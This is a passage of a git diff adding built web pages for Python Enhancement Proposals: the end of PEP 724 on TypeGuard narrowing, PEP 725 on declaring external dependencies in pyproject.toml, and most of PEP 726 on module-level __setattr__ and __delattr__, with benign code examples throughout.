In practice, the theoretic types for strict type guards cannot be expressed precisely in the Python type system. Type checkers should fall back on practical approximations of these types. As a rule of thumb, a type checker should use the same type narrowing logic as its handling of “isinstance”, and should produce results that are consistent with it. This guidance allows for changes and improvements if the type system is extended in the future.
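
For example, a sketch of how the table plays out for the motivating example, with A = int | list[int] and R = Iterable[Any] (expected results under strict semantics; reveal_type is a type checker construct, as in the earlier examples):

from collections.abc import Iterable
from typing import Any, TypeGuard

def is_iterable(val: object) -> TypeGuard[Iterable[Any]]:
    return isinstance(val, Iterable)

def func(val: int | list[int]):
    if is_iterable(val):
        reveal_type(val)  # list[int], the practical approximation of A∧R
    else:
        reveal_type(val)  # int, the practical approximation of A∧¬R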

+
+
+

Additional Examples

+

Any is consistent [1] with any other type, which means +stricter semantics can be applied.

+
 # Stricter type guard semantics are used in this case because
+ # "str" is consistent with "Any"
+def is_str(x: Any) -> TypeGuard[str]:
+    return isinstance(x, str)
+
+def test(x: float | str):
+    if is_str(x):
+        reveal_type(x)  # str
+    else:
+        reveal_type(x)  # float
+
+
+
+
+

Backwards Compatibility

+

This PEP proposes to change the existing behavior of TypeGuard. This has no +effect at runtime, but it does change the types evaluated by a type checker.

+
def is_int(val: int | str) -> TypeGuard[int]:
+    return isinstance(val, int)
+
+def func(val: int | str):
+    if is_int(val):
+        reveal_type(val)  # "int"
+    else:
+        reveal_type(val)  # Previously "int | str", now "str"
+
+
+

This behavioral change results in different types evaluated by a type checker. +It could therefore produce new (or mask existing) type errors.

+

Type checkers often improve narrowing logic or fix existing bugs in such logic, +so users of static typing will be used to this type of behavioral change.

+

We also hypothesize that it is unlikely that existing typed Python code relies +on the current behavior of TypeGuard. To validate our hypothesis, we +implemented the proposed change in pyright and ran this modified version on +roughly 25 typed code bases using mypy primer to see if there were any +differences in the output. As predicted, the behavioral change had minimal +impact. The only noteworthy change was that some # type: ignore comments +were no longer necessary, indicating that these code bases were already working +around the existing limitations of TypeGuard.

+
+

Breaking change

+

It is possible for a user-defined type guard function to rely on the old +behavior. Such type guard functions could break with the new behavior.

+
def is_positive_int(val: int | str) -> TypeGuard[int]:
+    return isinstance(val, int) and val > 0
+
+def func(val: int | str):
+    if is_positive_int(val):
+        reveal_type(val)  # "int"
+    else:
+        # With the older behavior, the type of "val" is evaluated as
+        # "int | str"; with the new behavior, the type is narrowed to
+        # "str", which is perhaps not what was intended.
+        reveal_type(val)
+
+
+

We think it is unlikely that such user-defined type guards exist in real-world +code. The mypy primer results didn’t uncover any such cases.

+
+
+
+

How to Teach This

+

Users unfamiliar with TypeGuard are likely to expect the behavior outlined +in this PEP, therefore making TypeGuard easier to teach and explain.

+
+
+

Reference Implementation

+

A reference implementation of this idea exists in pyright.

+

To enable the modified behavior, the configuration flag +enableExperimentalFeatures must be set to true. This can be done on a +per-file basis by adding a comment:

+
# pyright: enableExperimentalFeatures=true
+
+
+
+
+

Rejected Ideas

+
+

StrictTypeGuard

+

A new StrictTypeGuard construct was proposed. This alternative form would +be similar to a TypeGuard except it would apply stricter type guard +semantics. It would also enforce that the return type was consistent +[1] with the input type. See this thread for details: +StrictTypeGuard proposal

+

This idea was rejected because it is unnecessary in most cases and adds complexity. It would require the introduction of a new special form, and developers would need to be educated about the subtle difference between the two forms.

+
+
+

TypeGuard with a second output type

+

Another idea was proposed where TypeGuard could support a second optional +type argument that indicates the type that should be used for narrowing in the +negative (“else”) case.

+
def is_int(val: int | str) -> TypeGuard[int, str]:
+    return isinstance(val, int)
+
+
+

This idea was proposed here.

+

It was rejected because it was considered too complicated and addressed only +one of the two main limitations of TypeGuard. Refer to this thread for +the full discussion.

+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0724.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0725/index.html b/pep-0725/index.html new file mode 100644 index 00000000000..7ade105017c --- /dev/null +++ b/pep-0725/index.html @@ -0,0 +1,830 @@ + + + + + + + + PEP 725 – Specifying external dependencies in pyproject.toml | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 725 – Specifying external dependencies in pyproject.toml

+
+
Author:
+
Pradyun Gedam <pradyunsg at gmail.com>, +Ralf Gommers <ralf.gommers at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
17-Aug-2023
+
Post-History:
+
18-Aug-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies how to write a project’s external, or non-PyPI, build and +runtime dependencies in a pyproject.toml file for packaging-related tools +to consume.

+

This PEP proposes to add an [external] table to pyproject.toml with +three keys: “build-requires”, “host-requires” and “dependencies”. These +are for specifying three types of dependencies:

+
    +
  1. build-requires, build tools to run on the build machine
  2. host-requires, build dependencies needed for the host machine but also needed at build time
  3. dependencies, needed at runtime on the host machine but not needed at build time
+

Cross compilation is taken into account by distinguishing build and host dependencies. Optional build-time and runtime dependencies are supported too, in a manner analogous to how that is supported in the [project] table.

+
+
+

Motivation

+

Python packages may have dependencies on build tools, libraries, command-line +tools, or other software that is not present on PyPI. Currently there is no way +to express those dependencies in standardized metadata +[1], [2]. Key motivators for +this PEP are to:

+
    +
  • Enable tools to automatically map external dependencies to packages in other +packaging repositories,
  • +
  • Make it possible to include needed dependencies in error messages emitted by Python package installers and build frontends,
  • +
  • Provide a canonical place for package authors to record this dependency +information.
  • +
+

Packaging ecosystems like Linux distros, Conda, Homebrew, Spack, and Nix need full sets of dependencies for Python packages, and have tools like pyp2spec (Fedora), Grayskull (Conda), and dh_python (Debian) which attempt to automatically generate dependency metadata for their own package managers from the metadata in upstream Python packages. External dependencies are currently handled manually, because there is no metadata for this in pyproject.toml or any other standard location. Enabling automation of this conversion is a key benefit of this PEP, making packaging Python packages for distros easier and more reliable. In addition, the authors envision other types of tools making use of this information, e.g., dependency analysis tools like Repology, Dependabot and libraries.io. Software bill of materials (SBOM) generation tools may also be able to use this information, e.g. for flagging that external dependencies listed in pyproject.toml but not contained in wheel metadata are likely vendored within the wheel.

+

Packages with external dependencies are typically hard to build from source, +and error messages from build failures tend to be hard to decipher for end +users. Missing external dependencies on the end user’s system are the most +likely cause of build failures. If installers can show the required external +dependencies as part of their error message, this may save users a lot of time.

+

At the moment, information on external dependencies is only captured in +installation documentation of individual packages. It is hard to maintain for +package authors and tends to go out of date. It’s also hard for users and +distro packagers to find it. Having a canonical place to record this dependency +information will improve this situation.

+

This PEP is not trying to specify how the external dependencies should be used, +nor a mechanism to implement a name mapping from names of individual packages +that are canonical for Python projects published on PyPI to those of other +packaging ecosystems. Those topics should be addressed in separate PEPs.

+
+
+

Rationale

+
+

Types of external dependencies

+

Multiple types of external dependencies can be distinguished:

+
    +
  • Concrete packages that can be identified by name and have a canonical +location in another language-specific package repository. E.g., Rust +packages on crates.io, R packages on +CRAN, JavaScript packages on the +npm registry.
  • +
  • Concrete packages that can be identified by name but do not have a clear +canonical location. This is typically the case for libraries and tools +written in C, C++, Fortran, CUDA and other low-level languages. E.g., +Boost, OpenSSL, Protobuf, Intel MKL, GCC.
  • +
  • “Virtual” packages, which are names for concepts, types of tools or +interfaces. These typically have multiple implementations, which are +concrete packages. E.g., a C++ compiler, BLAS, LAPACK, OpenMP, MPI.
  • +
+

Concrete packages are straightforward to understand, and are a concept present +in virtually every package management system. Virtual packages are a concept +also present in a number of packaging systems – but not always, and the +details of their implementation varies.

+
+
+

Cross compilation

+

Cross compilation is not yet (as of August 2023) well-supported by stdlib +modules and pyproject.toml metadata. It is however important when +translating external dependencies to those of other packaging systems (with +tools like pyp2spec). Introducing support for cross compilation immediately +in this PEP is much easier than extending [external] in the future, hence +the authors choose to include this now.

+
+

Terminology

+

This PEP uses the following terminology:

+
    +
  • build machine: the machine on which the package build process is being +executed
  • +
  • host machine: the machine on which the produced artifact will be installed +and run
  • +
  • build dependency: dependency for building the package that needs to be +present at build time and itself was built for the build machine’s OS and +architecture
  • +
  • host dependency: dependency for building the package that needs to be +present at build time and itself was built for the host machine’s OS and +architecture
  • +
+

Note that this terminology is not consistent across build and packaging tools, +so care must be taken when comparing build/host dependencies in +pyproject.toml to dependencies from other package managers.

+

Note that “target machine” or “target dependency” is not used in this PEP. That +is typically only relevant for cross-compiling compilers or other such advanced +scenarios [3], [4] - this is out of scope for +this PEP.

+

Finally, note that while “dependency” is the term most widely used for packages +needed at build time, the existing key in pyproject.toml for PyPI +build-time dependencies is build-requires. Hence this PEP uses the keys +build-requires and host-requires under [external] for consistency.

+
+
+

Build and host dependencies

+

Clear separation of metadata associated with the definition of build and target +platforms, rather than assuming that build and target platform will always be +the same, is important [5].

+

Build dependencies are typically run during the build process - they may be +compilers, code generators, or other such tools. In case the use of a build +dependency implies a runtime dependency, that runtime dependency does not have +to be declared explicitly. For example, when compiling Fortran code with +gfortran into a Python extension module, the package likely incurs a +dependency on the libgfortran runtime library. The rationale for not +explicitly listing such runtime dependencies is two-fold: (1) it may depend on +compiler/linker flags or details of the build environment whether the +dependency is present, and (2) these runtime dependencies can be detected and +handled automatically by tools like auditwheel.

+

Host dependencies are typically not run during the build process, but only used +for linking against. This is not a rule though – it may be possible or +necessary to run a host dependency under an emulator, or through a custom tool +like crossenv. When host dependencies imply a runtime dependency, that runtime +dependency also does not have to be declared, just like for build dependencies.

+

When host dependencies are declared and a tool is not cross-compilation aware +and has to do something with external dependencies, the tool MAY merge the +host-requires list into build-requires. This may for example happen if +an installer like pip starts reporting external dependencies as a likely +cause of a build failure when a package fails to build from an sdist.
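
For example, a minimal sketch of such a merge for a tool that is not cross-compilation aware (the file handling is illustrative):

import tomllib  # Python 3.11+

with open("pyproject.toml", "rb") as f:
    external = tomllib.load(f).get("external", {})

# A non-cross-compilation-aware tool may treat host requirements as build
# requirements, per the provision above.
build_requires = external.get("build-requires", []) + external.get("host-requires", [])
print(build_requires)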

+
+
+
+

Specifying external dependencies

+
+

Concrete package specification through PURL

+

The two types of concrete packages are supported by PURL (Package URL), which +implements a scheme for identifying packages that is meant to be portable +across packaging ecosystems. Its design is:

+
scheme:type/namespace/name@version?qualifiers#subpath
+
+
+

The scheme component is a fixed string, pkg, and of the other +components only type and name are required. As an example, a package +URL for the requests package on PyPI would be:

+
pkg:pypi/requests
+
+
+

Adopting PURL to specify external dependencies in pyproject.toml solves a +number of problems at once - and there are already implementations of the +specification in Python and multiple languages. PURL is also already supported +by dependency-related tooling like SPDX (see +External Repository Identifiers in the SPDX 2.3 spec), +the Open Source Vulnerability format, +and the Sonatype OSS Index; +not having to wait years before support in such tooling arrives is valuable.

+

For concrete packages without a canonical package manager to refer to, either +pkg:generic/pkg-name can be used, or a direct reference to the VCS system +that the package is maintained in (e.g., +pkg:github/user-or-org-name/pkg-name). Which of these is more appropriate +is situation-dependent. This PEP recommends using pkg:generic when the +package name is unambiguous and well-known (e.g., pkg:generic/git or +pkg:generic/openblas), and using the VCS as the PURL type otherwise.
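
As a sketch, such PURLs can be constructed and parsed with packageurl-python, the reference implementation mentioned under Reference Implementation below (assumes the package is installed):

from packageurl import PackageURL

purl = PackageURL.from_string("pkg:generic/openblas")
print(purl.type, purl.name)  # generic openblas

vcs_purl = PackageURL.from_string("pkg:github/AbiWord/enchant")
print(vcs_purl.namespace, vcs_purl.name)  # AbiWord enchant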

+
+
+

Virtual package specification

+

There is no ready-made support for virtual packages in PURL or another +standard. There are a relatively limited number of such dependencies though, +and adopting a scheme similar to PURL but with the virtual: rather than +pkg: scheme seems like it will be understandable and map well to Linux +distros with virtual packages and to the likes of Conda and Spack.

+

The two known virtual package types are compiler and interface.

+
+
+

Versioning

+

Support in PURL for version expressions and ranges beyond a fixed version is +still pending, see the Open Issues section.

+
+
+

Dependency specifiers

+

Regular Python dependency specifiers (as originally defined in PEP 508) may +be used behind PURLs. PURL qualifiers, which use ? followed by a package +type-specific dependency specifier component, must not be used. The reason for +this is pragmatic: dependency specifiers are already used for other metadata in +pyproject.toml, any tooling that is used with pyproject.toml is likely +to already have a robust implementation to parse it. And we do not expect to +need the extra possibilities that PURL qualifiers provide (e.g. to specify a +Conan or Conda channel, or a RubyGems platform).
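
As a sketch of how a tool might handle this, the PURL part and the marker part can be split on the semicolon, with the marker evaluated via the packaging library (the split-on-semicolon approach mirrors PEP 508 requirements; the use of packaging here is an assumption, not part of this PEP):

from packaging.markers import Marker

requirement = "pkg:generic/XCB; platform_system == 'Linux'"
purl, sep, marker = requirement.partition(";")
print(purl.strip())  # pkg:generic/XCB
if sep:
    print(Marker(marker.strip()).evaluate())  # True only on Linux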

+
+
+
+

Usage of core metadata fields

+

The core metadata specification contains one relevant field, namely +Requires-External. This has no well-defined semantics in core metadata 2.1; +this PEP chooses to reuse the field for external runtime dependencies. The core +metadata specification does not contain fields for any metadata in +pyproject.toml’s [build-system] table. Therefore the build-requires +and host-requires content also does not need to be reflected in core +metadata fields. The optional-dependencies content from [external] +would need to either reuse Provides-Extra or require a new +Provides-External-Extra field. Neither seems desirable.

+
+

Differences between sdist and wheel metadata

+

A wheel may vendor its external dependencies. This happens in particular when +distributing wheels on PyPI or other Python package indexes - and tools like +auditwheel, delvewheel and delocate automate this process. As a result, a +Requires-External entry in an sdist may disappear from a wheel built from +that sdist. It is also possible that a Requires-External entry remains in a +wheel, either unchanged or with narrower constraints. auditwheel does not +vendor certain allow-listed dependencies, such as OpenGL, by default. In +addition, auditwheel and delvewheel allow a user to manually exclude +dependencies via a --exclude or --no-dll command-line flag. This is +used to avoid vendoring large shared libraries, for example those from CUDA.

+

Requires-External entries generated from external dependencies in +pyproject.toml in a wheel are therefore allowed to be narrower than those +for the corresponding sdist. They must not be wider, i.e. constraints must not +allow a version of a dependency for a wheel that isn’t allowed for an sdist, +nor contain new dependencies that are not listed in the sdist’s metadata at +all.

+
+
+

Canonical names of dependencies and -dev(el) split packages

+

It is fairly common for distros to split a package into two or more packages. +In particular, runtime components are often separately installable from +development components (headers, pkg-config and CMake files, etc.). The latter +then typically has a name with -dev or -devel appended to the +project/library name. This split is the responsibility of each distro to +maintain, and should not be reflected in the [external] table. It is not +possible to specify this in a reasonable way that works across distros, hence +only the canonical name should be used in [external].

+

The intended meaning of using a PURL or virtual dependency is “the full package +with the name specified”. It will depend on the context in which the metadata +is used whether the split is relevant. For example, if libffi is a host +dependency and a tool wants to prepare an environment for building a wheel, +then if a distro has split off the headers for libffi into a +libffi-devel package then the tool has to install both libffi and +libffi-devel.

+
+
+

Python development headers

+

Python headers and other build support files may also be split. This is the +same situation as in the section above (because Python is simply a regular +package in distros). However, a python-dev|devel dependency is special because +in pyproject.toml Python itself is an implicit rather than an explicit +dependency. Hence a choice needs to be made here - add python-dev implicitly, +or make each package author add it explicitly under [external]. For +consistency between Python dependencies and external dependencies, we choose to +add it implicitly. Python development headers must be assumed to be necessary +when an [external] table contains one or more compiler packages.
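
For example, a minimal sketch of that rule as a hypothetical helper a mapping tool could use:

def needs_python_dev(external: dict) -> bool:
    # Python development headers are implied whenever a compiler is declared.
    reqs = external.get("build-requires", []) + external.get("host-requires", [])
    return any(req.startswith("virtual:compiler/") for req in reqs)

print(needs_python_dev({"build-requires": ["virtual:compiler/c"]}))  # True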

+
+
+
+
+

Specification

+

If metadata is improperly specified then tools MUST raise an error to notify +the user about their mistake.

+
+

Details

+

Note that pyproject.toml content is in the same format as in PEP 621.

+
+

Table name

+

Tools MUST specify fields defined by this PEP in a table named [external]. +No tools may add fields to this table which are not defined by this PEP or +subsequent PEPs. The lack of an [external] table means the package either +does not have any external dependencies, or the ones it does have are assumed +to be present on the system already.

+
+
+

build-requires/optional-build-requires

+
    +
  • Format: Array of PURL strings (build-requires) and a table +with values of arrays of PURL strings (optional-build-requires)
  • +
  • Core metadata: N/A
  • +
+

The (optional) external build requirements needed to build the project.

+

For build-requires, it is a key whose value is an array of strings. Each +string represents a build requirement of the project and MUST be formatted as +either a valid PURL string or a virtual: string.

+

For optional-build-requires, it is a table where each key specifies an +extra set of build requirements and whose value is an array of strings. The +strings of the arrays MUST be valid PURL strings.

+
+
+

host-requires/optional-host-requires

+
    +
  • Format: Array of PURL strings (host-requires) and a table +with values of arrays of PURL strings (optional-host-requires)
  • +
  • Core metadata: N/A
  • +
+

The (optional) external host requirements needed to build the project.

+

For host-requires, it is a key whose value is an array of strings. Each +string represents a host requirement of the project and MUST be formatted as +either a valid PURL string or a virtual: string.

+

For optional-host-requires, it is a table where each key specifies an +extra set of host requirements and whose value is an array of strings. The +strings of the arrays MUST be valid PURL strings.

+
+
+

dependencies/optional-dependencies

+
    +
  • Format: Array of PURL strings (dependencies) and a table +with values of arrays of PURL strings (optional-dependencies)
  • +
  • Core metadata: Requires-External, N/A
  • +
+

The (optional) runtime dependencies of the project.

+

For dependencies, it is a key whose value is an array of strings. Each +string represents a dependency of the project and MUST be formatted as either a +valid PURL string or a virtual: string. Each string maps directly to a +Requires-External entry in the core metadata.

+

For optional-dependencies, it is a table where each key specifies an extra +and whose value is an array of strings. The strings of the arrays MUST be valid +PURL strings. Optional dependencies do not map to a core metadata field.

+
+
+
+

Examples

+

These examples show what the [external] content for a number of packages is +expected to be.

+

cryptography 39.0:

+
[external]
+build-requires = [
+  "virtual:compiler/c",
+  "virtual:compiler/rust",
+  "pkg:generic/pkg-config",
+]
+host-requires = [
+  "pkg:generic/openssl",
+  "pkg:generic/libffi",
+]
+
+
+

SciPy 1.10:

+
[external]
+build-requires = [
+  "virtual:compiler/c",
+  "virtual:compiler/cpp",
+  "virtual:compiler/fortran",
+  "pkg:generic/ninja",
+  "pkg:generic/pkg-config",
+]
+host-requires = [
+  "virtual:interface/blas",
+  "virtual:interface/lapack",  # >=3.7.1 (can't express version ranges with PURL yet)
+]
+
+
+

Pillow 10.1.0:

+
[external]
+build-requires = [
+  "virtual:compiler/c",
+]
+host-requires = [
+  "pkg:generic/libjpeg",
+  "pkg:generic/zlib",
+]
+
+[external.optional-host-requires]
+extra = [
+  "pkg:generic/lcms2",
+  "pkg:generic/freetype",
+  "pkg:generic/libimagequant",
+  "pkg:generic/libraqm",
+  "pkg:generic/libtiff",
+  "pkg:generic/libxcb",
+  "pkg:generic/libwebp",
+  "pkg:generic/openjpeg",  # add >=2.0 once we have version specifiers
+  "pkg:generic/tk",
+]
+
+
+

NAVis 1.4.0:

+
[project.optional-dependencies]
+r = ["rpy2"]
+
+[external]
+build-requires = [
+  "pkg:generic/XCB; platform_system=='Linux'",
+]
+
+[external.optional-dependencies]
+nat = [
+  "pkg:cran/nat",
+  "pkg:cran/nat.nblast",
+]
+
+
+

Spyder 6.0:

+
[external]
+dependencies = [
+  "pkg:cargo/ripgrep",
+  "pkg:cargo/tree-sitter-cli",
+  "pkg:golang/github.com/junegunn/fzf",
+]
+
+
+

jupyterlab-git 0.41.0:

+
[external]
+dependencies = [
+  "pkg:generic/git",
+]
+
+[external.optional-build-requires]
+dev = [
+  "pkg:generic/nodejs",
+]
+
+
+

PyEnchant 3.2.2:

+
[external]
+dependencies = [
+  # libenchant is needed on all platforms but only vendored into wheels on
+  # Windows, so on Windows the build backend should remove this external
+  # dependency from wheel metadata.
+  "pkg:github/AbiWord/enchant",
+]
+
+
+
+
+
+

Backwards Compatibility

+

There is no impact on backwards compatibility, as this PEP only adds new, +optional metadata. In the absence of such metadata, nothing changes for package +authors or packaging tooling.

+
+
+

Security Implications

+

There are no direct security concerns as this PEP covers how to statically +define metadata for external dependencies. Any security issues would stem from +how tools consume the metadata and choose to act upon it.

+
+
+

How to Teach This

+

External dependencies and if and how those external dependencies are vendored +are topics that are typically not understood in detail by Python package +authors. We intend to start from how an external dependency is defined, the +different ways it can be depended on—from runtime-only with ctypes or a +subprocess call to it being a build dependency that’s linked against— +before going into how to declare external dependencies in metadata. The +documentation should make explicit what is relevant for package authors, and +what for distro packagers.

+

Material on this topic will be added to the most relevant packaging tutorials, +primarily the Python Packaging User Guide. In addition, we expect that any +build backend that adds support for external dependencies metadata will include +information about that in its documentation, as will tools like auditwheel.

+
+
+

Reference Implementation

+

This PEP contains a metadata specification, rather than a code feature - hence there will not be code implementing the metadata spec as a whole. However, there are parts that do have a reference implementation:

+
    +
  1. The [external] table has to be valid TOML and therefore can be loaded with tomllib.
  2. The PURL specification, as a key part of this spec, has a Python package with a reference implementation for constructing and parsing PURLs: packageurl-python.
+

There are multiple possible consumers and use cases of this metadata, once +that metadata gets added to Python packages. Tested metadata for all of the +top 150 most-downloaded packages from PyPI with published platform-specific +wheels can be found in rgommers/external-deps-build. This metadata has +been validated by using it to build wheels from sdists patched with that +metadata in clean Docker containers.

+
+
+

Rejected Ideas

+
+

Specific syntax for external dependencies which are also packaged on PyPI

+

There are non-Python packages which are packaged on PyPI, such as Ninja, +patchelf and CMake. What is typically desired is to use the system version of +those, and if it’s not present on the system then install the PyPI package for +it. The authors believe that specific support for this scenario is not +necessary (or too complex to justify such support); a dependency provider for +external dependencies can treat PyPI as one possible source for obtaining the +package.

+
+
+

Using library and header names as external dependencies

+

A previous draft PEP (“External dependencies” (2015)) +proposed using specific library and header names as external dependencies. This +is too granular; using package names is a well-established pattern across +packaging ecosystems and should be preferred.

+
+
+
+

Open Issues

+
+

Version specifiers for PURLs

+

Support in PURL for version expressions and ranges is still pending. The pull +request at vers implementation for PURL seems close to being merged, at +which point this PEP could adopt it.

+
+
+

Versioning of virtual dependencies

+

Once PURL supports version expressions, virtual dependencies can be versioned +with the same syntax. It must be better specified however what the version +scheme is, because this is not as clear for virtual dependencies as it is for +PURLs (e.g., there can be multiple implementations, and abstract interfaces may +not be unambiguously versioned). E.g.:

+
    +
  • OpenMP: has regular MAJOR.MINOR versions of its standard, so would look +like >=4.5.
  • +
  • BLAS/LAPACK: should use the versioning used by Reference LAPACK, which +defines what the standard APIs are. Uses MAJOR.MINOR.MICRO, so would look +like >=3.10.0.
  • +
  • Compilers: these implement language standards. For C, C++ and Fortran these +are versioned by year. In order for versions to sort correctly, we choose to +use the full year (four digits). So “at least C99” would be >=1999, and +selecting C++14 or Fortran 77 would be ==2014 or ==1977 respectively. +Other languages may use different versioning schemes. These should be +described somewhere before they are used in pyproject.toml.
  • +
+

A logistical challenge is where to describe the versioning - given that this +will evolve over time, this PEP itself is not the right location for it. +Instead, this PEP should point at that (to be created) location.

+
+
+

Who defines canonical names and canonical package structure?

+

Similarly to the logistics around versioning is the question about what names +are allowed and where they are described. And then who is in control of that +description and responsible for maintaining it. Our tentative answer is: there +should be a central list for virtual dependencies and pkg:generic PURLs, +maintained as a PyPA project. See +https://discuss.python.org/t/pep-725-specifying-external-dependencies-in-pyproject-toml/31888/62. +TODO: once that list/project is prototyped, include it in the PEP and close +this open issue.

+
+
+

Syntax for virtual dependencies

+

The current syntax this PEP uses for virtual dependencies is +virtual:type/name, which is analogous to but not part of the PURL spec. +This open issue discusses supporting virtual dependencies within PURL: +purl-spec#222.

+
+
+

Should a host-requires key be added under [build-system]?

+

Adding host-requires for host dependencies that are on PyPI in order to +better support name mapping to other packaging systems with support for +cross-compiling may make sense. +This issue tracks this topic +and has arguments in favor and against adding host-requires under +[build-system] as part of this PEP.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0725.rst

+

Last modified: 2023-12-06 20:48:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0726/index.html b/pep-0726/index.html new file mode 100644 index 00000000000..22146cf902b --- /dev/null +++ b/pep-0726/index.html @@ -0,0 +1,405 @@ + + + + + + + + PEP 726 – Module __setattr__ and __delattr__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 726 – Module __setattr__ and __delattr__

+
+
Author:
+
Sergey B Kirpichev <skirpichev at gmail.com>
+
Sponsor:
+
Adam Turner <python at quite.org.uk>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Aug-2023
+
Python-Version:
+
3.13
+
Post-History:
+
06-Apr-2023, +31-Aug-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes supporting user-defined __setattr__ +and __delattr__ methods on modules to extend customization +of module attribute access beyond PEP 562.

+
+
+

Motivation

+

There are several potential uses of a module __setattr__:

+
    +
  1. To prevent setting an attribute at all (i.e. make it read-only)
  2. To validate the value to be assigned
  3. To intercept setting an attribute and update some other state
+

Proper support for read-only attributes would also require adding the +__delattr__ function to prevent their deletion.

+

It would be convenient to directly support such customization, by recognizing +__setattr__ and __delattr__ methods defined in a module that would act +like normal object.__setattr__() and +object.__delattr__() methods, except that they will be defined +on module instances. Together with existing __getattr__ and __dir__ +methods this will streamline all variants of customizing module attribute access.

+

For example

+
# mplib.py
+
+CONSTANT = 3.14
+prec = 53
+dps = 15
+
+def dps_to_prec(n):
+    """Return the number of bits required to represent n decimals accurately."""
+    return max(1, int(round((int(n)+1)*3.3219280948873626)))
+
+def prec_to_dps(n):
+    """Return the number of accurate decimals that can be represented with n bits."""
+    return max(1, int(round(int(n)/3.3219280948873626)-1))
+
+def validate(n):
+    n = int(n)
+    if n <= 0:
+        raise ValueError('Positive integer expected')
+    return n
+
+def __setattr__(name, value):
+    if name == 'CONSTANT':
+        raise AttributeError('Read-only attribute!')
+    if name == 'dps':
+        value = validate(value)
+        globals()['dps'] = value
+        globals()['prec'] = dps_to_prec(value)
+        return
+    if name == 'prec':
+        value = validate(value)
+        globals()['prec'] = value
+        globals()['dps'] = prec_to_dps(value)
+        return
+    globals()[name] = value
+
+def __delattr__(name):
+    if name in ('CONSTANT', 'dps', 'prec'):
+        raise AttributeError('Read-only attribute!')
+    del globals()[name]
+
+
+
>>> import mplib
+>>> mplib.foo = 'spam'
+>>> mplib.CONSTANT = 42
+Traceback (most recent call last):
+  ...
+AttributeError: Read-only attribute!
+>>> del mplib.foo
+>>> del mplib.CONSTANT
+Traceback (most recent call last):
+  ...
+AttributeError: Read-only attribute!
+>>> mplib.prec
+53
+>>> mplib.dps
+15
+>>> mplib.dps = 5
+>>> mplib.prec
+20
+>>> mplib.dps = 0
+Traceback (most recent call last):
+  ...
+ValueError: Positive integer expected
+
+
+
+
+

Existing Options

+

The current workaround is assigning the __class__ of a module object to a +custom subclass of types.ModuleType (see [1]).

+

For example, to prevent modification or deletion of an attribute we could use:

+
# mod.py
+
+import sys
+from types import ModuleType
+
+CONSTANT = 3.14
+
+class ImmutableModule(ModuleType):
+    # Unlike the module-level functions proposed by this PEP, these are
+    # methods on a class, so they need the explicit self parameter.
+    def __setattr__(self, name, value):
+        raise AttributeError('Read-only attribute!')
+
+    def __delattr__(self, name):
+        raise AttributeError('Read-only attribute!')
+
+sys.modules[__name__].__class__ = ImmutableModule
+
+
+

But this variant is slower (~2x) than the proposed solution. More +importantly, it also brings a noticeable speed regression (~2-3x) for +attribute access.

+
+
+

Specification

+

The __setattr__ function at the module level should accept two +arguments, the name of an attribute and the value to be assigned, +and return None or raise an AttributeError.

+
def __setattr__(name: str, value: typing.Any, /) -> None: ...
+
+
+

The __delattr__ function should accept one argument, +the name of an attribute, and return None or raise an +AttributeError:

+
def __delattr__(name: str, /) -> None: ...
+
+
+

The __setattr__ and __delattr__ functions are looked up in the +module __dict__. If present, the appropriate function is called to +customize setting the attribute or its deletion, else the normal +mechanism (storing/deleting the value in the module dictionary) will work.

+

Defining module __setattr__ or __delattr__ only affects lookups made +using the attribute access syntax — directly accessing the module globals +(whether by globals() within the module, or via a reference to the module’s +globals dictionary) is unaffected. For example:

+
>>> import mod
+>>> mod.__dict__['foo'] = 'spam'  # bypasses __setattr__, defined in mod.py
+
+
+

or

+
# mod.py
+
+def __setattr__(name, value):
+   ...
+
+foo = 'spam'  # bypasses __setattr__
+globals()['bar'] = 'spam'  # here too
+
+def f():
+    global x
+    x = 123
+
+f()  # and here
+
+
+

To use a module global and trigger __setattr__ (or __delattr__), +one can access it via sys.modules[__name__] within the module’s code:

+
# mod.py
+
+import sys
+
+sys.modules[__name__].foo = 'spam'  # bypasses __setattr__ (not defined yet)
+
+def __setattr__(name, value):
+    ...
+
+sys.modules[__name__].bar = 'spam'  # triggers __setattr__
+
+
+

This limitation is intentional (just as for PEP 562), because the interpreter highly optimizes access to module globals, and disabling all that and going through special methods written in Python would slow down the code unacceptably.

+
+
+

How to Teach This

+

The “Customizing module attribute access” [1] section of the documentation +will be expanded to include new functions.

+
+
+

Reference Implementation

+

The reference implementation for this PEP can be found in CPython PR #108261.

+
+
+

Backwards compatibility

+

This PEP may break code that uses module level (global) names +__setattr__ and __delattr__, but the language reference +explicitly reserves all undocumented dunder names, and allows +“breakage without warning” [2].

+

The performance implications of this PEP are small, since an additional dictionary lookup is much cheaper than storing/deleting the value in the dictionary. Also it is hard to imagine a module that expects the user to set (and/or delete) attributes enough times for this to be a performance concern. On the other hand, the proposed mechanism allows overriding the setting/deleting of attributes without affecting the speed of attribute access, which is a much more likely scenario to incur a performance penalty.

+
+
+

Discussion

+

As pointed out by Victor Stinner, the proposed API could be useful already in the stdlib, for example to ensure that the type of sys.modules is always a dict:

+
>>> import sys
+>>> sys.modules = 123
+>>> import asyncio
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<frozen importlib._bootstrap>", line 1260, in _find_and_load
+AttributeError: 'int' object has no attribute 'get'
+
+
+

